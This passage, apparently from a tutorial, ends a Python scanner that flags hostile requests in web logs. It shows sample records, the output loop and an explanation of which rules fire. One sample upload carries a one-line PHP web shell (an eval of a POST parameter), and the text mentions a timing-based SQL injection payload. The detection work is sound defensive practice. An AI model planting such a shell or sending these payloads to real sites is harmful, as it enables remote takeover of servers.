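    {"method": "POST", "path": "/profile.php", "content_type": "multipart/form-data; boundary=----x",
     "duration_ms": 30,
     "body": '------x\r\nContent-Disposition: form-data; name="file"; filename="2.php"\r\n'
             'Content-Type: application/x-php\r\n\r\n<?php @eval($_POST["hacker"]); ?>\r\n------x--\r\n'},
    {"method": "POST", "path": "/profile.php", "content_type": "multipart/form-data; boundary=----y",
     "duration_ms": 35,
     "body": '------y\r\nContent-Disposition: form-data; name="file"; filename="avatar.png"\r\n'
             'Content-Type: image/png\r\n\r\n\x89PNG...\r\n------y--\r\n'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"{f.rule:22} {f.path:18} {f.detail}" + (" [timing confirms]" if f.confirmed else ""))
```

Run against the constructed records, the first login request is reported as a timing-confirmed SLEEP payload, the benign login is silent, the `2.php` upload trips both upload rules, and the PNG trips neither. The timing confirmation matters operationally: a delay function in a field that did not actually slow the response is still worth a look, but one that did is evidence the string reached the query.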